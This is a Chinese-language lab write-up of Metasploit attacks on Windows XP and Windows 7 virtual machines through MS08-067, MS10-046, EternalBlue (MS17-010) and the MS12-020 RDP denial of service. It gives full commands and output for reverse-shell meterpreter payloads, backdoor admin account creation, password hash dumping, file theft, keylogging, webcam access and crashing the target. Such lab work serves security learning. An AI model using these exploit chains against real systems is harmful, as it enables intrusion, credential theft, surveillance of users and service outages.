[windows常见漏洞攻击实验-MS08-067、MS10-046、MS17-010、MS-12-020]
本文通过MSF对win7靶机和winxp靶机进行了四个常见的微软系统漏洞[MS08-067、MS10-046、MS17-010、MS-12-020]的攻击验证。
0.实验环境
网段:192.168.155.0/24
网卡模式:NAT
攻击机1-Kali-ip:192.168.155.2
攻击机2-mac-ip:192.168.155.1
靶机1winxpSP3英文版-ip:192.168.155.18
靶机2-win7-ip:192.168.155.19
1.MS08-067[RPC]
1.1 漏洞描述
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞。Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。 对于Windows 2000、XP和Server 2003,无需认证便可以利用该漏洞;对于Windows Vista和Server 2008,可能需要认证。
1.2 主机发现
nmap -F 192.168.155.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-03 03:50 EDT
Nmap scan report for 192.168.155.1
Host is up (0.00084s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
53/tcp open domain
5000/tcp open upnp
49152/tcp open unknown
MAC Address: FA:FF:C2:C2:93:64 (Unknown)
Nmap scan report for 192.168.155.18
Host is up (0.0018s latency).
Not shown: 93 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)
Nmap scan report for 192.168.155.2
Host is up (0.0000060s latency).
All 100 scanned ports on 192.168.155.2 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds
目标主机IP:192.168.155.18
端口开放情况:
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)
目标端口:445
服务:microsoft-ds
1.3 利用MSF通过ms08-067漏洞渗透目标系统
msfconsole
search ms08-067
use msf6 > use exploit/windows/smb/ms08_067_netapi
show targets
set target 0
set RHOSTS 192.168.155.18
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
exploit
[*] Started reverse TCP handler on 192.168.155.2:4444
[*] 192.168.155.18:445 - Automatically detecting the target...
[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.155.18
[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at 2022-05-03 04:42:05 -0400
1.4 后渗透利用
1.查看权限:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
可以看到获得了system权限。
2.Shell
meterpreter > shell
Process 3980 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
成功进入目标系统的shell环境。
3.添加账号
C:\WINDOWS\system32>net user sxk 123.com /add
net user sxk 123.com /add
The command completed successfully.
4.将新账号添加到管理员组中
C:\WINDOWS\system32>net localgroup administrators sxk /add
net localgroup administrators sxk /add
The command completed successfully.
用户已经成功添加到目标系统的管理员组中。
5.截屏
meterpreter > screenshot
Screenshot saved to: /root/Desktop/YhioHCHD.jpeg
2.MS10-046[快捷方式自动执行代码]
2.1 漏洞描述
Microsoft Windows快捷方式LNK文件自动执行代码漏洞。
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。 Windows没有正确的处理LNK文件,特制的LNK文件可能导致 Windows自动执行快捷方式文件所指定的代码。这些代码可能位 于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞
受影响系统包括:Windows XP SP3/SP2、Vista SP2/SP1、Server 2008 R2/SP2和Win 7。
2.2 渗透攻击
search ms10-046
exploit/windows/browser/ms10_046_shortcut_icon_dllloader
exploit/windows/smb/ms10_046_shortcut_icon_dllloader
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.155.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
set SRVHOST 192.168.155.2 【注意设置的是kali也就是攻击机的IP】
set payload windows/meterpreter /reverse_tcp
set LPORT 4444
show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.155.2 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.155.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
exploit
在受害xp主机浏览器中访问攻击机kali的ip
http://192.168.155.2:80/
弹出了一个文件夹,其中有一个【.dll文件】和一个【快捷方式】,【双击】快捷方式后,回到Kali 观察效果。
显示获得一台机器的控制权,接下来输入命令【sessions 1】进入到目标系统的【meterpreter】控制界面,漏洞复现成功。
sessions 1
2.3 后渗透利用
参考 ms08-067
3.MS17-010[SMB]
3.1 漏洞描述
漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞
Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使 攻击者在目标服务器上执行任意代码。如果攻击失败,会导致 拒绝服务,对业务造成一定安全风险。
受影响的系统:Microsoft Windows Server 2016、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、 Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等。
3.2 渗透攻击
3.2.1 目标发现
search ms17-010
auxiliary/scanner/smb/smb_ms17_010 辅助模块可以帮助我们发现存在相应漏洞的目标。
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.155.18 192.168.155.19 192.168.155.0
扫描发现,192.168.155.19也就是靶机2,win7系统可能存在ms17-010漏洞。
back
退出当前模块
3.2.2 渗透攻击
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.155.19
set LHOST 192.168.155.1
run
成功拿到system权限。
3.3 后渗透利用
3.3.1 获取屏幕快照
meterpreter > screenshot
Screenshot saved to: /Users/xiaokaisi/MYSHXRuM.jpeg
3.3.2文件上传
meterpreter > upload /Users/xiaokaisi/MYSHXRuM.jpeg
[*] uploading : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] uploaded : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
pwd
C:\Windows\system32
在目标系统C盘中成功上传文件。
3.3.3 下载文件
meterpreter > download drivers/etc/hosts
[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] download : drivers/etc/hosts -> /Users/xiaokaisi/hosts
成功下载到目标系统的hosts文件。
3.3.4 进入shell
meterpreter > shell
Process 6872 created.
Channel 3 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ��
C:\Windows\system32>
3.3.5 获取口令hash
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
破解哈希值:
259745cb123a52aa2e693aaacca2db52
31d6cfe0d16ae931b73c59d7e0c089c0
3.3.6 摄像头
meterpreter > webcam_list [查看摄像头]
[-] No webcams were found
meterpreter > webcam_snap [通过摄像头拍照]
[-] Target does not have a webcam
meterpreter > webcam_stream [通过摄像头拍摄视频]
[-] Target does not have a webcam
3.3.7 键盘监听
比如要对目标系统用户Administrator的键盘进行记录的话,就需要把进程迁移到Administrator的进程。在system权限下,是无法捕获Administrator的键盘记录。
keyscan_start开启键盘监听后,用keyscan_dump进行记录的导出,如果不想监听了才keyscan_stop。不是先keyscan_stop再keyscan_dump。
ps找到合适的进程进行迁移
meterpreter>ps
3668 3608 explorer.exe 【常用的进程】
meterpreter > migrate 3668
[*] Migrating from 1048 to 3668...
[*] Migration completed successfully.
meterpreter > getuid
Server username: client-PC\client
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
wo shi client ,<Shift>Ilove china<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
成功监听到了目标系统上的用户的键盘输入。“wo shi client ,Ilove china”
4.MS12-020[RDP]
4.1 漏洞描述
远程桌面协议存在的一个重大漏洞,入侵者可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。开放远程桌面服务并使用默认的3389端口的会成为攻击目标。
此外远程桌面协议(RDP)是一个多通道(multi-channal)的协议,可用于做DoS攻击。
根据微软的安全公告,Windows全系列操作系统(WinXP/Vista/Win7/Win2000/ Win2003/Win2008)均存在受控威胁。
4.2 目标发现
search ms12-020
- auxiliary/scanner/rdp/ms12_020_check
- auxiliary/dos/windows/rdp/ms12_020_maxchannelids
use auxiliary/scanner/rdp/ms12_020_check
使用辅助模块的扫描器进行目标发现。
set RHOSTS 192.168.155.0/24
set THREADS 20
run
扫描发现目标192.168.155.19也就是win7是可能的攻击目标。
4.3 渗透攻击
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3389 yes The target port (TCP)
set RHOSTS 192.168.155.19
run
[*] Running module against 192.168.155.19
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - 210 bytes sent
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - Checking RDP status...
[+] 192.168.155.19:3389 - 192.168.155.19:3389 seems down
[*] Auxiliary module execution completed
目标主机蓝屏。被迫下线重启,DOS攻击成功。